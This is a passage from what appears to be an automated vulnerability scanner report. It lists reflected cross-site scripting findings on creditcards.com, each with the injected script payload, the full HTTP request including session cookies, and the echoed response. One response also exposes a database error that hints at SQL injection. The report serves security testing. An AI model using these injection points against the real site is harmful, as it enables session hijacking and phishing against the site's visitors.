The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e54c'><script>alert(1)</script>992a03d2816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /0-apr-credit-cards.php?8e54c'><script>alert(1)</script>992a03d2816=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_cc=true; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; CCsCookieimp=1308307185; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307192206%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/0-apr-credit-cards.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:20 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43233

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>0% APR Credit Cards: Apply Now - CreditCards.com</title>
<meta name="
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?8e54c'><script>alert(1)</script>992a03d2816=1' border=0 width=1 height=1>
...[SNIP]...

3.157. http://www.creditcards.com/instant-approval.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/instant-approval.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 425aa'><script>alert(1)</script>aaa9c6466f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /instant-approval.php?425aa'><script>alert(1)</script>aaa9c6466f9=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/0-apr-credit-cards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; CCsCookieimp=1308307229; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253A0-apr-credit-cards%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/instant-approval.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:45:36 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Instant Approval Credit Cards - CreditCards.com</title>
<meta name="k
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?425aa'><script>alert(1)</script>aaa9c6466f9=1' border=0 width=1 height=1>
...[SNIP]...

3.158. http://www.creditcards.com/oc/ ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000133)</script> request parameter is copied into the HTML document as plain text between tags. The payload 572a4<script>alert(1)</script>2c16d2b44e3 was submitted in the '"--></style></script><script>netsparker(0x000133)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?'"--></style></script><script>netsparker(0x000133)</script>572a4<script>alert(1)</script>2c16d2b44e3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:29 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3646
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:29 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1; SQL:SELECT
...[SNIP]...
</script>572a4<script>alert(1)</script>2c16d2b44e3' border=0 width=1 height=1>
...[SNIP]...

3.159. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfa38'><script>alert(1)</script>f5556ed2a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1&cfa38'><script>alert(1)</script>f5556ed2a83=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:25 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705422593373287&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3150
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2C%2C%2Cdeleted; expires=Sun, 17-Jul-2011 10:42:25 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581&pg=1477&pgpos=1&cfa38'><script>alert(1)</script>f5556ed2a83=1' border=0 width=1 height=1>
...[SNIP]...

3.160. http://www.creditcards.com/oc/ [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the nsextt request parameter is copied into the name of an HTML tag attribute. The payload 3ddcb><script>alert(1)</script>4137f0b0de3 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000122)%3C/script%3E3ddcb><script>alert(1)</script>4137f0b0de3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475038104514&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3234
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581&pg=1477&pgpos=1&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000122)%3C/script%3E3ddcb><script>alert(1)</script>4137f0b0de3' border=0 width=1 height=1>
...[SNIP]...

3.161. http://www.creditcards.com/oc/ [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 630bd'><script>alert(1)</script>02cc4dcb018 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1&nsextt=630bd'><script>alert(1)</script>02cc4dcb018 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:51 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475115190663&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3156
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:51 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581&pg=1477&pgpos=1&nsextt=630bd'><script>alert(1)</script>02cc4dcb018' border=0 width=1 height=1>
...[SNIP]...

3.162. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d70cc'><script>alert(1)</script>098224f9e67 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581&pg=1477d70cc'><script>alert(1)</script>098224f9e67&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:41 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477d70cc%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E098224f9e67&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705404174504985&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3233
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:41 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581&pg=1477d70cc'><script>alert(1)</script>098224f9e67&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.163. http://www.creditcards.com/oc/ [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da5db"%3balert(1)//9c3eb669395 was submitted in the pg parameter. This input was echoed as da5db";alert(1)//9c3eb669395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22145581&pg=1477da5db"%3balert(1)//9c3eb669395&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:44 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477da5db%22%3Balert%281%29%2F%2F9c3eb669395&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705404424865985&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3190
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:44 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477da5db";alert(1)//9c3eb669395;22145581;1;0"
s.purchaseID="1012011061705404424865985"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477da5db";alert(1)//9c3eb669395"
s.eVar26="1"

...[SNIP]...

3.164. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ccd6'><script>alert(1)</script>f45d7c3de16 was submitted in the pgpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581&pg=1477&pgpos=18ccd6'><script>alert(1)</script>f45d7c3de16 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:56 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=18ccd6%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef45d7c3de16&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705405622010273&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3233
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:56 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581&pg=1477&pgpos=18ccd6'><script>alert(1)</script>f45d7c3de16' border=0 width=1 height=1>
...[SNIP]...

3.165. http://www.creditcards.com/oc/ [pgpos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pgpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed7a5"%3balert(1)//e2659232659 was submitted in the pgpos parameter. This input was echoed as ed7a5";alert(1)//e2659232659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1ed7a5"%3balert(1)//e2659232659 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:00 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1ed7a5%22%3Balert%281%29%2F%2Fe2659232659&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705410049197283&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3190
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:41:00 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
nes. */
s.pageName="lead confirmation"
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1ed7a5";alert(1)//e2659232659"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;22145581;1;0"
s.purchaseID="1012011061705410049197283"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar
...[SNIP]...

3.166. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84e94"%3balert(1)//1b17c87de4c was submitted in the pid parameter. This input was echoed as 84e94";alert(1)//1b17c87de4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/?pid=2214558184e94"%3balert(1)//1b17c87de4c&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:29 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705402985647032&data3=0&sid=1889&c=2214558184e94%22%3Balert%281%29%2F%2F1b17c87de4c
Vary: Accept-Encoding
Content-Length: 2819
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:29 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
op5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;2214558184e94";alert(1)//1b17c87de4c;1;0"
s.purchaseID="1012011061705402985647032"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477"
s.eVar26="1"
s.eVar18=s.c_r('s_vi');

...[SNIP]...

3.167. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ef0a1'><script>alert(1)</script>24470930548 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22145581ef0a1'><script>alert(1)</script>24470930548&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:28 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3835
Content-Type: text/html
